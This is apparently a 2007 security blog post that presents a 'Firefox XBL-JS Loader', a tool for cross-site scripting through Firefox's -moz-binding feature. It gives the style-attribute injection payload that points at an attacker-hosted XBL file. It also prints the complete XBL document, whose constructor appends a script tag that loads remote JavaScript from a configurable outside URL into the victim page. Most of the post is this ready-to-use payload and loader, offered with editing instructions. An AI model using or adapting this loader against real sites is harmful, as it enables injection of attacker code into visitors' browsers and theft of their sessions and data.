---
layout: post
status: publish
published: true
title: Firefox XBL-JS Loader v1.0

wordpress_id: 294
wordpress_url: http://pro.grammatic.org/post-firefox-xbljs-loader-v10-4.aspx
date: !binary |-
  MjAwNy0wNS0xNSAxMzo0MTo1NSArMDIwMA==
date_gmt: !binary |-
  MjAwNy0wNS0xNSAxMzo0MTo1NSArMDIwMA==
categories:
- Technology
- InfoSec
tags:
- information security
comments: []
---
<p>Today I wrote a simple tool to illustrate the binding of a Javascript document to a page using Firefox's XBL support (-moz-binding) in an XSS context.</p>
<p>The process works as follows:</p>
<ol>
<li>Inject attributes as follows (different encodings may be necessary): &lt;element style = "-moz-binding:url('http://site.com/STXSS_XBL.xml#loader');" /&gt;.</li>
<li>Browser loads XBL document.</li>
<li>XBL document modifies DOM to include &lt;script src="evil_script.js"/&gt;.</li>
<li>Browser loads and parses Javascript.</li>
</ol>
<p>The required XBL document (STXSS_XBL.xml) is as follows:</p>

{% highlight xml %}
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
    <binding id="loader">
        <implementation>
            <constructor>
                <![CDATA[
                    //This is the STXSS XBL Loader
                    //Edit this line to the URL of the STXSS Javascript
                    var url = "http://www.your-site.com/STXSS_JS.js";
                    //Do not edit below this line
                    var scr = document.createElement("script");
                    scr.setAttribute("src",url);
                    var bodyElement = document.getElementsByTagName("html").item(0);
                    bodyElement.appendChild(scr);
                 ]]>
            </constructor>
        </implementation>
    </binding>
</bindings>
{% endhighlight %}